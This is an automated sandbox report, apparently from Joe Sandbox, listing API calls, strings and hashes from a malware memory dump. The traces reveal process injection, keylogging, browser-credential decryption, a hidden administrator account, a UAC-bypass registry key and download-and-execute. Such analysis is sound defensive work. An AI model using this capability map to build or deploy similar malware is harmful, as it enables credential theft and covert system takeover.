                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID: EnumHeapManagerOpenServicesStatus$AllocateCloseErrorHandleLastProcessServicelstrcmp
                                                • String ID: ServicesActive
                                                • API String ID: 899334174-3071072050
                                                APIs
                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?), ref: 00407A16
                                                  • Part of subcall function 00408617: GetCurrentProcess.KERNEL32(00419698,00407A03,?,?,?,?), ref: 0040861C
                                                  • Part of subcall function 00408617: IsWow64Process.KERNEL32(00000000), ref: 00408623
                                                  • Part of subcall function 00408617: GetProcessHeap.KERNEL32 ref: 00408629
                                                • VirtualAllocEx.KERNEL32(00000000,00000000,00100000,00003000,00000040,00000000), ref: 00407A3A
                                                • VirtualProtectEx.KERNEL32 ref: 00407A5B
                                                • VirtualAllocEx.KERNEL32(00000000,33370000,00000100,00003000,00000040), ref: 00407A73
                                                • WriteProcessMemory.KERNEL32 ref: 00407A9D
                                                • WriteProcessMemory.KERNEL32 ref: 00407AC5
                                                • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407ADD
                                                Similarity
                                                • API ID: Process$Virtual$AllocMemoryWrite$CreateCurrentHeapOpenProtectRemoteThreadWow64
                                                • String ID: XXXXXX
                                                • API String ID: 813767414-582547948
                                                APIs
                                                • GetFullPathNameA.KERNEL32(004196A8,00000104,?,00000000), ref: 00409E17
                                                • PathCombineA.SHLWAPI(?,?,00415F88), ref: 00409E36
                                                • FindFirstFileA.KERNEL32(?,?), ref: 00409E46
                                                • PathCombineA.SHLWAPI(?,004196A8,0000002E), ref: 00409E7D
                                                • PathCombineA.SHLWAPI(?,?,Accounts\Account.rec0), ref: 00409E8C
                                                  • Part of subcall function 00409ADF: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00409AFC
                                                  • Part of subcall function 00409ADF: GetLastError.KERNEL32 ref: 00409B09
                                                  • Part of subcall function 00409ADF: CloseHandle.KERNEL32(00000000), ref: 00409B10
                                                • FindNextFileA.KERNEL32(00000000,?), ref: 00409EA4
                                                Similarity
                                                • API ID: Path$CombineFile$Find$CloseCreateErrorFirstFullHandleLastNameNext
                                                • String ID: .$Accounts\Account.rec0
                                                • API String ID: 3873318193-2526347284
                                                APIs
                                                • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000,770113FB,00000000), ref: 00411FEC
                                                • GetCurrentProcessId.KERNEL32 ref: 00411FF7
                                                  • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,00411E36,00400000,?,?,00000000,?,?,0041349D), ref: 0040108B
                                                  • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,0041349D), ref: 00401092
                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,000000FF), ref: 00412015
                                                • VirtualAllocEx.KERNEL32(00000000,00000000,00000800,00003000,00000040), ref: 0041203F
                                                • WriteProcessMemory.KERNEL32 ref: 00412057
                                                • VirtualProtectEx.KERNEL32 ref: 00412068
                                                • VirtualAllocEx.KERNEL32(00411FD3,00000000,00000103,00003000,00000004), ref: 0041207F
                                                • WriteProcessMemory.KERNEL32 ref: 00412095
                                                • CreateRemoteThread.KERNEL32(00411FD3,00000000,00000000,0000010E,00000000,00000000,00000000), ref: 004120A8
                                                Similarity
                                                • API ID: Process$Virtual$AllocHeapMemoryWrite$AllocateCreateCurrentFileModuleNameOpenProtectRemoteThread
                                                • String ID:
                                                • API String ID: 900395357-0
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040D4AB
                                                • OpenServiceW.ADVAPI32(00000000,?,00000002), ref: 0040D4C0
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4CD
                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040D4E6
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4FA
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4FD
                                                Similarity
                                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                • String ID: ServicesActive
                                                • API String ID: 493672254-3071072050
                                                APIs
                                                • InitializeSecurityDescriptor.ADVAPI32(?,00000001,00000000,?,?,?,?,?,?,?,?,?,00411B06), ref: 004118C7
                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,00411B06), ref: 004118DB
                                                • RegCreateKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00000000,00000000,00020006,0000000C,00411B06,?), ref: 00411913
                                                • RegCloseKey.ADVAPI32(00411B06), ref: 00411920
                                                • SetLastError.KERNEL32(00000000), ref: 0041192B
                                                Strings
                                                • Software\Classes\Folder\shell\open\command, xrefs: 00411909
                                                Similarity
                                                • API ID: DescriptorSecurity$CloseCreateDaclErrorInitializeLast
                                                • String ID: Software\Classes\Folder\shell\open\command
                                                • API String ID: 1473660444-2536721355
                                                APIs
                                                • BCryptOpenAlgorithmProvider.BCRYPT(00000020,AES,00000000,00000000,?,00000000,?,?,?,0040CA5F,?), ref: 0040CCD1
                                                • BCryptSetProperty.BCRYPT(00000020,ChainingMode,ChainingModeGCM,00000020,00000000,?,0040CA5F,?), ref: 0040CCEA
                                                • BCryptGenerateSymmetricKey.BCRYPT(00000020,0040CA5F,00000000,00000000,?,00000020,00000000,?,0040CA5F,?), ref: 0040CCFF
                                                Similarity
                                                • API ID: Crypt$AlgorithmGenerateOpenPropertyProviderSymmetric
                                                • String ID: AES$ChainingMode$ChainingModeGCM
                                                • API String ID: 1692524283-1213888626
                                                APIs
                                                • LocalAlloc.KERNEL32(00000040,-0000001F,?,?,?,00000000,?,00000000), ref: 0040CFE0
                                                • BCryptDecrypt.BCRYPT(?,0000000C,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,00000000), ref: 0040D00E
                                                  • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,00411E36,00400000,?,?,00000000,?,?,0041349D), ref: 0040108B
                                                  • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,0041349D), ref: 00401092
                                                • LocalFree.KERNEL32(?), ref: 0040D096
                                                Similarity
                                                • API ID: HeapLocal$AllocAllocateCryptDecryptFreeProcess
                                                • String ID: 0$v1
                                                • API String ID: 4131498132-3331332043
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004120C7
                                                • Process32First.KERNEL32(00000000,?), ref: 004120F4
                                                • Process32Next.KERNEL32(00000000,?), ref: 0041211B
                                                • CloseHandle.KERNEL32(00000000), ref: 00412126
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                • String ID: explorer.exe
                                                • API String ID: 420147892-3187896405
                                                APIs
                                                • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040FA5A
                                                • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040FA6A
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: RtlGetVersion$ntdll.dll
                                                • API String ID: 2574300362-1489217083
                                                APIs
                                                  • Part of subcall function 00405F53: GetProcessHeap.KERNEL32(00000000,000000F4,00410477,?,770113FB,00000000,00405A34), ref: 00405F56
                                                  • Part of subcall function 00405F53: HeapAlloc.KERNEL32(00000000), ref: 00405F5D
                                                • GetLogicalDriveStringsW.KERNEL32(00000104,00000000), ref: 00410060
                                                • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 00410087
                                                • GetDriveTypeW.KERNEL32(?,00000000,00000000), ref: 004100B7
                                                Similarity
                                                • API ID: Drive$HeapLogicalStrings$AllocProcessType
                                                • String ID: X,@
                                                • API String ID: 2408535517-3523447844
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,-00000001,770145FD,?,?,?,0040A5E6,00001000,?,00000000,00001000), ref: 0040A650
                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040A5E6), ref: 0040A686
                                                • lstrcpyW.KERNEL32(?,Could not decrypt), ref: 0040A6BD
                                                Similarity
                                                • API ID: AllocCryptDataGlobalUnprotectlstrcpy
                                                • String ID: Could not decrypt
                                                • API String ID: 3112367126-1484008118
                                                APIs
                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0040D471,?,?,00000001), ref: 0040F5C2
                                                • LookupAccountSidW.ADVAPI32(00000000,0040D471,?,00000104,?,00000010,?), ref: 0040F5E7
                                                • GetLastError.KERNEL32(?,?,00000001), ref: 0040F5F1
                                                • FreeSid.ADVAPI32(0040D471,?,?,00000001), ref: 0040F5FF
                                                Similarity
                                                • API ID: AccountAllocateErrorFreeInitializeLastLookup
                                                • String ID:
                                                • API String ID: 1866703397-0
                                                APIs
                                                • CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040CC73
                                                • LocalAlloc.KERNEL32(00000040,?,?,0040CBC6,?,00000000,?,00000000,?), ref: 0040CC81
                                                • CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040CC97
                                                • LocalFree.KERNEL32(?,?,0040CBC6,?,00000000,?,00000000,?), ref: 0040CCA5
                                                Similarity
                                                • API ID: BinaryCryptLocalString$AllocFree
                                                • String ID:
                                                • API String ID: 4291131564-0
                                                APIs
                                                  • Part of subcall function 0040F76B: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0040F79C
                                                  • Part of subcall function 00403335: lstrcatW.KERNEL32(00000000,770113FB,?,?,00413589,?,00411515,00413589,004135B9,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00413589,00000000,770113FB,00000000), ref: 00403365
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                  • Part of subcall function 0040362D: lstrcpyW.KERNEL32(00000000,770113FB), ref: 00403657
                                                  • Part of subcall function 0040351D: PathFindExtensionW.SHLWAPI(?), ref: 00403527
                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00402860
                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 0040288A
                                                Similarity
                                                • API ID: Path$DownloadExecuteExtensionFileFindFolderFreeShellSpecialVirtuallstrcatlstrcpy
                                                • String ID: open
                                                • API String ID: 4166385161-2758837156
                                                APIs
                                                • lstrlenA.KERNEL32(?,?,?,00000000,?,0040AA4B,?,?,?,?,?,encryptedUsername,?,?,00000000,C0000000), ref: 0040B17B
                                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0040B1A9
                                                  • Part of subcall function 00405EB4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00403652,?,?,?,0041150A,004135B9,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00413589,00000000,770113FB,00000000), ref: 00405EBE
                                                • lstrcpyA.KERNEL32(00000000,?), ref: 0040B1F6
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocBinaryCryptStringVirtuallstrcpylstrlen
                                                • String ID:
                                                • API String ID: 573875632-0
                                                • Opcode ID: 237850a45561d8afdd84ed52f6ea1cc7b30d16a63204f57b6bc7a383c55df0d8
                                                • Instruction ID: 1e628b6e4e0e23564231c11d106335a829b2c53438db6e7f5bd85d2f6d685f2b
                                                • Opcode Fuzzy Hash: 237850a45561d8afdd84ed52f6ea1cc7b30d16a63204f57b6bc7a383c55df0d8
                                                • Instruction Fuzzy Hash: E211D6B6D00209AFDB01DF95D8848EFBBBCEB48344F1080BAF505A7251D7359A45CBA4
                                                APIs
                                                • OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,00000000,?,?,?,?,?,?,?,?,0040E18E), ref: 0040F644
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,?), ref: 0040F655
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,?,?,?,00000000,00000000), ref: 0040F68A
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Token$AdjustLookupOpenPrivilegePrivilegesProcessValue
                                                • String ID:
                                                • API String ID: 658607936-0
                                                • Opcode ID: c6676e19c9dce9a8bc6835bcfd14c0ec21f64ff11388038882d9bdd43d36353e
                                                • Instruction ID: 8332c94ce834d9b4f7767c05631ca274011cc841fa13cb12cd9f11b9cc91c3c6
                                                • Opcode Fuzzy Hash: c6676e19c9dce9a8bc6835bcfd14c0ec21f64ff11388038882d9bdd43d36353e
                                                • Instruction Fuzzy Hash: F6110A75A10219AFEB20CFE5CC849EFFBBCFB48700F10493AA501F2150E7749A058BA0
                                                APIs
                                                • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?), ref: 0040CB24
                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,0040CAD5,?,00000000,?,?,?,?,0040CA44), ref: 0040CB3B
                                                • LocalFree.KERNEL32(0040CAD5,?,?,?,?,?,0040CAD5,?,00000000,?,?,?,?,0040CA44), ref: 0040CB5B
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Local$AllocCryptDataFreeUnprotect
                                                • String ID:
                                                • API String ID: 2068576380-0
                                                • Opcode ID: d07056e6058d1041da3554faf4bd58ce6aa8df7867045fc1a761222ec7b01c75
                                                • Instruction ID: 215fa3fe11215347c3d1e171e52ffe0a00858422dd62dca2444b50e8a43090fe
                                                • Opcode Fuzzy Hash: d07056e6058d1041da3554faf4bd58ce6aa8df7867045fc1a761222ec7b01c75
                                                • Instruction Fuzzy Hash: D80100B5900209EFDB059FA5DC0A8EFBBB9EB88311B10416AED41A3350E67599448AA4
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?,?,?), ref: 0040FF54
                                                • FindNextFileW.KERNEL32(00000000,00000010,00000000), ref: 0040FFF6
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileFind$FirstNext
                                                • String ID:
                                                • API String ID: 1690352074-0
                                                • Opcode ID: d2868153f9785a800d3c7c19bd89a0e56c9854feed143a2a1c2cad7e71a544f5
                                                • Instruction ID: 51f66a3543baf517c4de2523c6378d3d031a6120c04ef48b92764a27087f23dd
                                                • Opcode Fuzzy Hash: d2868153f9785a800d3c7c19bd89a0e56c9854feed143a2a1c2cad7e71a544f5
                                                • Instruction Fuzzy Hash: 6D314F71D002099BDB20EFA5C849BEEBBB8AF48315F10417AE401B3291DB78AE84CF54
                                                APIs
                                                • NetUserAdd.NETAPI32(00000000,00000001,?,00000000,?,00000000,0054E080,?,?,?,0040E634,0054E07C,0054E080), ref: 0040D45A
                                                  • Part of subcall function 0040F56D: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0040D471,?,?,00000001), ref: 0040F5C2
                                                  • Part of subcall function 0040F56D: LookupAccountSidW.ADVAPI32(00000000,0040D471,?,00000104,?,00000010,?), ref: 0040F5E7
                                                  • Part of subcall function 0040F56D: GetLastError.KERNEL32(?,?,00000001), ref: 0040F5F1
                                                  • Part of subcall function 0040F56D: FreeSid.ADVAPI32(0040D471,?,?,00000001), ref: 0040F5FF
                                                • NetLocalGroupAddMembers.NETAPI32(00000000,00000000,00000003,00010201,00000001,?,?,?,0040E634,0054E07C,0054E080), ref: 0040D47B
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Free$AccountAllocateErrorGroupInitializeLastLocalLookupMembersUserVirtual
                                                • String ID:
                                                • API String ID: 188019324-0
                                                • Opcode ID: 597690d96667462ad59adff689e7d2223bd5119e156d35c2d7ab40080fe41be3
                                                • Instruction ID: 35dae00ccef6b446e0c841155e11f4e793a47711b1090637ee54e787cfdbff70
                                                • Opcode Fuzzy Hash: 597690d96667462ad59adff689e7d2223bd5119e156d35c2d7ab40080fe41be3
                                                • Instruction Fuzzy Hash: 10110072900208AFDB11DFAAD8849EEF7F8EF59354B10443AF951E7250D7B4AA448B50
                                                APIs
                                                • recv.WS2_32(?,?,00001000,00000000), ref: 0040D0FD
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: recv
                                                • String ID:
                                                • API String ID: 1507349165-0
                                                • Opcode ID: b8ce05e2267d41a055ddfcb89261a2ac0265fef77b176401f6e3574e179a6e53
                                                • Instruction ID: b725e4cad62ebb6751eb6d5db7d7c83580f6971ea39e9a12e705d98c42646a3f
                                                • Opcode Fuzzy Hash: b8ce05e2267d41a055ddfcb89261a2ac0265fef77b176401f6e3574e179a6e53
                                                • Instruction Fuzzy Hash: 7CF0FC7190024867DB11E7A4CC41FE7335CAB083D9F10047AF145F71C4D6F8AD848768
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4f7567a5fbc2f57699485bbede3328af11860cad7103f0f8210cbd2d61708212
                                                • Instruction ID: 32b45bac7427164607efcda96c7a1d2a37098db285ec3ad8997b80a647b6199f
                                                • Opcode Fuzzy Hash: 4f7567a5fbc2f57699485bbede3328af11860cad7103f0f8210cbd2d61708212
                                                • Instruction Fuzzy Hash: B0313075E0061AAFDB14CF98C8E09AEB7F5FF89314B1981AAD401A7711D774EE81CB84
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 70a123d0a38f8f88a807db75fd4d29bf0a4123b82be8a1095914169ea9aca7b1
                                                • Instruction ID: 3cf98475d967d69efdc540c71a22f5173ff4fdfd19d679cdcd5144f8e32d7552
                                                • Opcode Fuzzy Hash: 70a123d0a38f8f88a807db75fd4d29bf0a4123b82be8a1095914169ea9aca7b1
                                                • Instruction Fuzzy Hash: 3421ADB1D00108ABDB15DF99C8C2BEEBB79AF44314F14407BF545FB281E634598587A8
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                                • Instruction ID: 451d43169ccbb2215ef147c0df9262fe2611908ea92783b9fe1fda873cbde726
                                                • Opcode Fuzzy Hash: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                                • Instruction Fuzzy Hash: 42E08C32200510CBC720DB1AD840993B3B4EBC0370B2A046AE48AE7601C3A8FCE2CA94
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                                • Instruction ID: c7ffb21236a01e711484f890f9ab4a733e178a674d023b35b9ed1a8d03666c8f
                                                • Opcode Fuzzy Hash: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                                • Instruction Fuzzy Hash: 9FD0EA783619408FDB51CF18C694E02B3E4EB49B60B098491E909CB736D738ED40EA40
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                • Instruction Fuzzy Hash:
                                                APIs
                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0040B6AC
                                                • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040B6B5
                                                  • Part of subcall function 0040362D: lstrcpyW.KERNEL32(00000000,770113FB), ref: 00403657
                                                  • Part of subcall function 00403272: wsprintfW.USER32 ref: 0040328D
                                                • PathFileExistsW.SHLWAPI(0040A760), ref: 0040B7A3
                                                • PathFileExistsW.SHLWAPI(0040A760), ref: 0040B7FF
                                                • LoadLibraryW.KERNEL32(?,0040A760,?,00000104,00000000), ref: 0040B83E
                                                • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040B849
                                                • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040B854
                                                • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040B85F
                                                • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040B86A
                                                • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040B957
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoad$CurrentDirectory$ExistsFilePath$FreeVirtuallstrcpywsprintf
                                                • String ID: .dll$NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$PR_GetError$mozglue.dll$msvcp$msvcp120.dll$msvcr$msvcr120.dll$nss3.dll$softokn3.dll
                                                • API String ID: 410702425-850564384
                                                • Opcode ID: 0eb50f1faf709f0bde6a9787119c38c6d943e26492c92136b83585a01522b8d5
                                                • Instruction ID: 3cd22339cab3e0b34e6d6484c9c52d57fa8d2725b080aa23ef78d8fb8eeae670
                                                • Opcode Fuzzy Hash: 0eb50f1faf709f0bde6a9787119c38c6d943e26492c92136b83585a01522b8d5
                                                • Instruction Fuzzy Hash: 0B91FAB1A00609EBDB04EFB2D8969DEBB79FF54304F10413BA515B7291DB386B44CB98
                                                APIs
                                                • DefWindowProcA.USER32(?,?,?,?), ref: 00409084
                                                • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 004090A1
                                                • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 004090D7
                                                • GetForegroundWindow.USER32 ref: 004090F4
                                                • GetWindowTextW.USER32(00000000,?,00000104), ref: 00409105
                                                • lstrlenW.KERNEL32(-00000210,-00000010,?,Unknow), ref: 004091EE
                                                • PostQuitMessage.USER32(00000000), ref: 00409381
                                                • RegisterRawInputDevices.USER32 ref: 004093B0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InputWindow$Data$DevicesForegroundMessagePostProcQuitRegisterTextlstrlen
                                                • String ID: Unknow
                                                • API String ID: 3853268301-1240069140
                                                • Opcode ID: b1d566fadd52c86fa729ab5ccdd7d07d9617a4ccf85f69fe7327a1be861f1dc8
                                                • Instruction ID: 9779d0e792247a9e55b3318ab2f410e550cd0691825362868d8aeff0002b904c
                                                • Opcode Fuzzy Hash: b1d566fadd52c86fa729ab5ccdd7d07d9617a4ccf85f69fe7327a1be861f1dc8
                                                • Instruction Fuzzy Hash: DFA18C71100200AFC700DF65DC89DAB7BA8FF89344F44853EF949A72A2D739AD14CB69
                                                APIs
                                                • InitializeCriticalSection.KERNEL32(?,?,?), ref: 0040E407
                                                • DeleteCriticalSection.KERNEL32(?,?,?), ref: 0040E41E
                                                • EnterCriticalSection.KERNEL32(0054E020,?,?), ref: 0040E42A
                                                  • Part of subcall function 0040DE1F: RegOpenKeyExW.ADVAPI32 ref: 0040DE51
                                                • RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList,00000000,00000000,00000000,000F013F,00000000,?,?), ref: 0040E5FF
                                                • RegSetValueExW.ADVAPI32 ref: 0040E61A
                                                • RegCloseKey.ADVAPI32(?), ref: 0040E623
                                                • LeaveCriticalSection.KERNEL32(0054E020,00000000,0054E07C,0054E080,?,?), ref: 0040E65E
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                  • Part of subcall function 00403437: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040345C
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                  • Part of subcall function 00403261: lstrlenW.KERNEL32(770113FB,00403646,?,?,?,0041150A,004135B9,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00413589,00000000,770113FB,00000000), ref: 00403268
                                                • LeaveCriticalSection.KERNEL32(0054E020,00000000,rpdp,0054E080,00000000,rudp,0054E07C,0054E07C,0054E080,?,?), ref: 0040E6C4
                                                • LeaveCriticalSection.KERNEL32(0054E020,00000000,?,?), ref: 0040E6F4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$Leavelstrlen$lstrcpy$CloseCreateDeleteEnterFreeInitializeOpenValueVirtual
                                                • String ID: T$ T$ T$ T$8T$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList$rpdp$rudp$|T$|T$|T
                                                • API String ID: 2046459734-3123880581
                                                • Opcode ID: cd0415c43985efbc87f442af4b777adfe855260c681dc1457212b221c0ff1409
                                                • Instruction ID: 34b65afe6731ba6ecc596c756d3df6cf655f2d54d3c1a9bc6dda8ec2e9e85144
                                                • Opcode Fuzzy Hash: cd0415c43985efbc87f442af4b777adfe855260c681dc1457212b221c0ff1409
